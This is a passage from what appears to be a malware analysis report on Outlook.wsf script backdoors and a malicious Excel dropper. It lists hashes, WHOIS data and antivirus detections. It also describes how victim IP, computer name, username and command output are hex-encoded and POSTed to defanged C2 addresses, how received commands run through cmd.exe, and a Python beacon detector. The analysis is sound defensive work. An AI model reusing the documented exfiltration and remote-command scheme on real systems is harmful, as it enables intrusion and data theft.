User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 9813
Host: 88[.]119[.]170[.]124
vl=[re-ordered hex-encoded victim's system data and the output of the command executed]
--End request--
Displayed below is a sample POST request that contains the encoded victim's system data and the output of the command executed:
--Begin request--
POST /lcekcnkxkbllmwlpoklgof HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 5689
Host: 88[.]119[.]170[.]124
vl=A093273633E2339332927232320A723242D6E6D346365E7226F466E77467273E265674D6469267477C024204601063744215623203A2E202224279426216621227E262052222240296E426262......F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C63066A2027EC2122220524492D8F230420F2397E6CEC225648F56E59600C63706AE0604C4410625E607022202856253E521D013
--End request--
It is designed to send these messages below to the C2 server using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":
--Begin message format--
"200/!*##*!/19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|#@*@#|" or "/!*##*!/".
"19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|sory" ==> When a command or a specific task fails
--End message format--
Outlook.wsf
34242
HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5
b3504546810e78304e879df76d4eec46
SHA1
d02d93b707ac999fde0545792870a2b82dc3a238
SHA256
f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
SHA512
d7a78259988e17b1487a3cc2a3a8ba7aaa1cae8904b2ee3da79a6a77266822f726a367cda9c1b59aab3cf369ebf5bec1f279e8e6ff036376073f8a20e3053576
SSDEEP
384:NaeE4zZlbO1/RW8upzK2Hkq3+LBOuCBSnUosLCFt9tMRYCnFCg+tJCXw2V3:NaeEpu9VEU+LQEsMt9tUl+ta
3.699753
Dropped_By
Connected_To
Characterized_By
Figure 18
88.119.170.124
Related_To
Related_To
Related_To
Connected_From
Domain Name: bacloud.info
Registry Domain ID: 9ae51aee8f3144059e17d8f8fba3095e-DONUTS
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2021-03-09T06:39:04Z
Creation Date: 2010-04-22T12:46:58Z
Registry Expiry Date: 2022-04-22T12:46:58Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse@publicdomainregistry.com
Registrar Abuse Contact Phone: +91.2230797500
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: GDPR Masked
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: GDPR Masked
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.laisvas.lt
Name Server: ns3.laisvas.lt
Name Server: ns5.laisvas.lt
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-02-01T10:54:20Z <<<
ZaibCb15Ak.xls
254976
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Nov 1 07:15:30 2021, Last Saved Time/Date: Mon Nov 1 07:17:43 2021, Security: 0
MD5
6cef87a6ffb254bfeb61372d24e1970a
SHA1
e21d95b648944ad2287c6bc01fcc12b05530e455
SHA256
4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
SHA512
a99ca0f86da547d2979bd854b29824da77472b16aa2d2dcbc0e5c3eb4b488ae69f9d3006bc326b52b9145076247b64ba55cacfaaf30e417ea8d4f71447d682aa
SSDEEP
6144:8k3hOdsylKlgryzc4bNhZF+E+W2knArYi4uU4pVZ8lx+tSea4awSi:PiLZpVZ8lx+tna4TZ
7.232043
Contains
Contains
Characterized_By
Figure 19
Outlook.wsf
11980
HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5
e1f97c819b1d26748ed91777084c828e
SHA1
4209a007fcf4d4913afad323eb1d1ae466f911a6
SHA256
ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
SHA512
8a98999bc6ff4094b5e1d795e32345aca4e70b8e91ad1e4ba3f6ec6dabcf5591dc5c9740e6c326b23c6120b847611006d86e56dd2590ce30cf76eb076723f477
SSDEEP
192:/LsEDuNb8pWGNm91llKk8YwB4o6N8M6sBISa9FE8mJSZbHCExZ9EEFaeYuan:zsquN4K/aHYa42saSstmJSZbxZLK
4.063463
Contained_Within
Characterized_By
Figure 20
> %temp%\\stari.txt
Select * from Win32_IP4RouteTable
"%COMPUTERNAME%"
"%USERNAME%"
E442779124B3E37D2A3F77D77B66A.Open jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d,KVj42Vxufd0LRBFfZDVj3wRxJ5CX9vOX,False
E442779124B3E37D2A3F77D77B66A.send jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d
--End strings--
It collects the victim's system IP address, computer name, and username in the format below:
--Begin information--
Format: [victim's system Internet Protocol address]|!)!)!|[Computer name]/Username
Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01"
--End information--
The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb" and wait for a response.
Displayed below is the POST request used to exfiltrate the victim's system data:
--Begin request--
POST /jznkmustntblvmdvgcwbvqb HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 5[.]199[.]133[.]149
vl=6793263635E4329334937215349F743442D53463ED3....7CC2212199221C5494228E4F70322D38562E3E6212713
--End request--
The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. The script uses the same built-in algorithm to re-order and hex-decode these payloads, which contain command-line scripts. It searches the decoded payload for the string "|!)!)!|" or "/!&^^&!/"; if either is present, it parses out the command-line scripts and executes them with the command below:
--Begin command--
"cmd.exe /c [decoded command scripts]| >> %temp%\\stari.txt"
--End command--
The output of the command-line scripts executed is stored into a text file "%temp%\stari.txt". It reads the output of the command executed from the text file "%temp%\stari.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:
--Begin format--
Format: "[victim's system Internet Protocol address]|!)!)!|[Computer name]/Username|!)!)!|[Output of the command executed]"
Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"
--End format--
The above victim's system information and the output command executed are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv" and wait for a response (next command).
Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:
--Begin request--
POST /oeajgyxyxclqmfqayv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 5[.]199[.]133[.]149
vl=[re-ordered hex-encoded victim's system data and the output of the command executed]
--End request--
Displayed below is a sample POST request that contains the encoded victim's system data and the output of the command executed:
--Begin request--
POST /oeajgyxyxclqmfqayv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 5689
Host: 5[.]199[.]133[.]149
vl=[re-ordered hex-encoded data, not reproduced here]
--End request--
The malware is also designed to send the messages below to the C2 server using the URI "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv". Each message is hex-encoded, the hex bytes are re-ordered, and the result is appended to the string "vl":
--Begin message format--
"200/!&^^&!/19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01" ==> Sent when the decoded C2 command data received contains the string "|!)!)!|" or "/!&^^&!/".
"19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|sory" ==> Sent when a command or a specific task fails.
--End message format--]]>
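As an added defender-side illustration (not code from the MAR or from the malware), the following Python flags a raw HTTP request that matches the exfiltration POST shown above and splits an already-decoded beacon body into its fields using the delimiters documented in this section. The names Beacon, is_c2_post, parse_beacon and SAMPLE_REQUEST are introduced here, and the hex decoding and byte re-ordering are assumed to have been undone before parsing.

```python
from dataclasses import dataclass
from typing import Optional

# Delimiters and request markers come from the message and POST formats in the
# report; the parsing and matching logic is an added illustration.
FIELD_SEP = "|!)!)!|"
STATUS_SEP = "/!&^^&!/"
C2_URI = "/oeajgyxyxclqmfqayv"
C2_UA = "WinHttp.WinHttpRequest.5"

@dataclass
class Beacon:
    kind: str        # "status", "failure" or "output"
    victim_ip: str
    computer: str
    user: str
    payload: str = ""

def is_c2_post(request_text: str) -> bool:
    """Flag a raw HTTP request matching the exfiltration POST shown above:
    the C2 URI, the WinHttpRequest user agent and a form body starting 'vl='."""
    head, _, body = request_text.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    return (request_line.startswith("POST " + C2_URI + " ")
            and C2_UA in head
            and body.startswith("vl="))

def parse_beacon(decoded: str) -> Optional[Beacon]:
    """Split a beacon body into fields. Assumes the hex decoding and the byte
    re-ordering (not detailed in this section) have already been undone."""
    kind = "output"
    prefix = "200" + STATUS_SEP
    if decoded.startswith(prefix):          # acknowledgement message
        kind = "status"
        decoded = decoded[len(prefix):]
    parts = decoded.split(FIELD_SEP, 2)     # separators inside output survive
    if len(parts) < 2 or "/" not in parts[1]:
        return None                         # not in the documented format
    computer, user = parts[1].split("/", 1)
    payload = parts[2] if len(parts) == 3 else ""
    if kind == "output" and payload == "sory":
        kind = "failure"                    # literal "sory" marks a failed task
    return Beacon(kind, parts[0], computer, user, payload)

# Constructed sample request, modelled on the one in the report (IP defanged).
SAMPLE_REQUEST = ("POST /oeajgyxyxclqmfqayv HTTP/1.1\r\n"
                  "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
                  "Host: 5[.]199[.]133[.]149\r\n\r\nvl=0123abcd")
```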
Outlook.wsf
40674
HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5
cb84c6b5816504c993c33360aeec4705
SHA1
9f212961d1de465c20e84f3c4d8ac0302e02ce37
SHA256
d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
SHA512
fec12d5871544bf1d3038baa2c209ceb4b8c8c852b60a222d2e0486b15593cecd26e130bdadcf0927e5f556cca42d3a0bb764fcc00b685a0e464531d36a7c156
SSDEEP
768:Wqy5Dr1BE9cmvcmPcvmzm/mAm6zYAr8LBFMwEVxLa3knrjrSK0rvdRz0nq8Fj:Vy5zE9V1cnHCkn3+vdRz0nqG
4.028422
Contained_Within
Characterized_By
Connected_To
Figure 21
5.199.133.149
Related_To
Related_To
Related_To
Related_To
Connected_From
80
TCP
Domain Name: SERVDISCOUNT-CUSTOMER.COM
Registry Domain ID: 1882350046_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.psi-usa.info
Registrar URL: http://www.psi-usa.info
Updated Date: 2021-10-28T07:05:37Z
Creation Date: 2014-10-27T07:58:37Z
Registry Expiry Date: 2022-10-27T07:58:37Z
Registrar: PSI-USA, Inc. dba Domain Robot
Registrar IANA ID: 151
Registrar Abuse Contact Email: domain-abuse@psi-usa.info
Registrar Abuse Contact Phone: +49.94159559482
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.NTDNS.DE
Name Server: NS2.NTDNS.DE
Name Server: NS3.NTDNS.DE
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-01-31T07:23:45Z <<<
MAEC Characterization of a27655d14b0aabec8db70ae08a623317
Symantec
Trojan Horse
Trend Micro HouseCall
Trojan.928E7209
Trend Micro
Trojan.928E7209
ESET
a variant of Win32/Agent.ACHN trojan
trojan
MAEC Characterization of 218d4151b39e4ece13d3bf5ff4d1121b
Bitdefender
Generic.Exploit.Donut.2.5DE6F72C
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.5DE6F72C (B)
Lavasoft
Generic.Exploit.Donut.2.5DE6F72C
command-and-control
MAEC Characterization of 860f5c2345e8f5c268c9746337ade8b7
VirusBlokAda
BScope.Trojan.Agentb
ESET
a variant of Win32/Agent.ADJB trojan
MAEC Characterization of cec48bcdedebc962ce45b63e201c0624
Bitdefender
Trojan.GenericKD.37827502
McAfee
RDN/Generic.dx
K7
Trojan ( 005893651 )
IKARUS
Trojan.Win32.Agent
Symantec
Trojan.Gen.MBT
Zillya!
Trojan.Agent.Win32.2507968
AhnLab
Trojan/Win.Generic
Emsisoft
Trojan.GenericKD.37827502 (B)
Avira
TR/Agent.fizgi
VirusBlokAda
BScope.Trojan.Agentb
ESET
a variant of Win32/Agent.ADJB trojan
Lavasoft
Trojan.GenericKD.37827502
MAEC Characterization of a65696d6b65f7159c9ffcd4119f60195
Bitdefender
Generic.Exploit.Donut.2.50F4F7F0
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.50F4F7F0 (B)
Lavasoft
Generic.Exploit.Donut.2.50F4F7F0
MAEC Characterization of 4a022ea1fd2bf5e8c0d8b2343a230070
Bitdefender
Generic.Exploit.Donut.2.B85DA16C
Sophos
ATK/DonutLdr-A
Emsisoft
Generic.Exploit.Donut.2.B85DA16C (B)
Lavasoft
Generic.Exploit.Donut.2.B85DA16C
MAEC Characterization of 6c084c8f5a61c6bec5eb5573a2d51ffb
Bitdefender
Generic.Exploit.Shellcode.PE.1.A192654B
K7
Riskware ( 0040eff71 )
IKARUS
Trojan.PowerShell.Runner
Symantec
Trojan Horse
Sophos
Mal/Swrort-Y
Emsisoft
Generic.Exploit.Shellcode.PE.1.A192654B (B)
Avira
HEUR/AGEN.1144435
VirusBlokAda
BScope.Trojan.Wacatac
ESET
PowerShell/Runner.AA trojan
Lavasoft
Generic.Exploit.Shellcode.PE.1.A192654B
MAEC Characterization of a0421312705e847a1c8073001fd8499c
ESET
PowerShell/Agent.FP trojan
MAEC Characterization of a16f4f0c00ca43d5b20f7bc30a3f3559
ESET
PowerShell/Agent.FP trojan
MAEC Characterization of c0c2cd5cc018e575816c08b36969c4a6
NANOAV
Trojan.Script.Heuristic-js.iacgm
MAEC Characterization of 37fa9e6b9be7242984a39a024cade2d5
Emsisoft
JS.Heur.Backdoor.2.BA440290.Gen (B)
Lavasoft
JS.Heur.Backdoor.2.BA440290.Gen
backdoor
MAEC Characterization of b0ab12a5a4c232c902cdeba421872c37
Bitdefender
Trojan.Generic.30623170
McAfee
RDN/Sagent
IKARUS
Trojan.VBS.Agent
Symantec
Trojan.Mdropper
Trend Micro HouseCall
Possibl.564B8E70
Antiy
Trojan[Downloader]/MSOffice.Agent.pmk
Sophos
Troj/DocDl-AEVH
Emsisoft
Trojan.Generic.30623170 (B)
Trend Micro
Possibl.564B8E70
ESET
VBS/Agent.PMK trojan
NANOAV
Trojan.Ole2.Vbs-heuristic.druvzi
Lavasoft
Trojan.Generic.30623170
Quick Heal
X97M.Trojan.Agent.45255
downloader
dropper
loader
MAEC Characterization of e182a861616a9f12bc79988e6a4186af
Bitdefender
Trojan.Generic.31341871
McAfee
VBS/Agent.hw
IKARUS
Trojan.VBS.Agent
Symantec
VBS.Downloader.Trojan
Trend Micro HouseCall
TROJ_FR.A1B65C22
Sophos
Troj/HTA-AB
Emsisoft
Trojan.Generic.31341871 (B)
Trend Micro
TROJ_FR.A1B65C22
Avira
VBS/Dldr.Agent.HC
ESET
VBS/Agent.PMK trojan
Lavasoft
Trojan.Generic.31341871
Quick Heal
VBS.Downloader.45256
MAEC Characterization of b3504546810e78304e879df76d4eec46
McAfee
VBS/Downloader.aak
IKARUS
JS.Trojan-Downloader.Agent
Symantec
Trojan Horse
Sophos
Troj/HTA-AB
Avira
JS/Dldr.Agent.bah
NANOAV
Trojan.Script.Vbs-heuristic.druvzi
Quick Heal
VBS.Downloader.45256
MAEC Characterization of 6cef87a6ffb254bfeb61372d24e1970a
Bitdefender
Trojan.Generic.31220507
McAfee
RDN/Woreflint
IKARUS
Trojan.SuspectCRC
Symantec
Trojan.Mdropper
Trend Micro HouseCall
Trojan.E78080B2
Antiy
Trojan[Downloader]/MSOffice.Agent.gho
NETGATE
Trojan.Win32.Malware
Sophos
Troj/DocDl-AEVH
Emsisoft
Trojan.Generic.31220507 (B)
Trend Micro
Trojan.E78080B2
Avira
W97M/Hancitor.tnvir
ESET
a variant of Generik.GHODWTC trojan
NANOAV
Trojan.Ole2.Vbs-heuristic.druvzi
Lavasoft
Trojan.Generic.31220507
Quick Heal
Ole.Trojan.A3288643
MAEC Characterization of cb84c6b5816504c993c33360aeec4705
IKARUS
VBS.Trojan-Downloader.Agent
Symantec
VBS.Downloader.Trojan
Sophos
Troj/HTA-AB
Avira
VBS/Dldr.Agent.LE
NANOAV
Trojan.Script.Vbs-heuristic.druvzi
Quick Heal
VBS.Downloader.45256
10369127.r1.v1
Malicious Code
Malicious Artifact Detected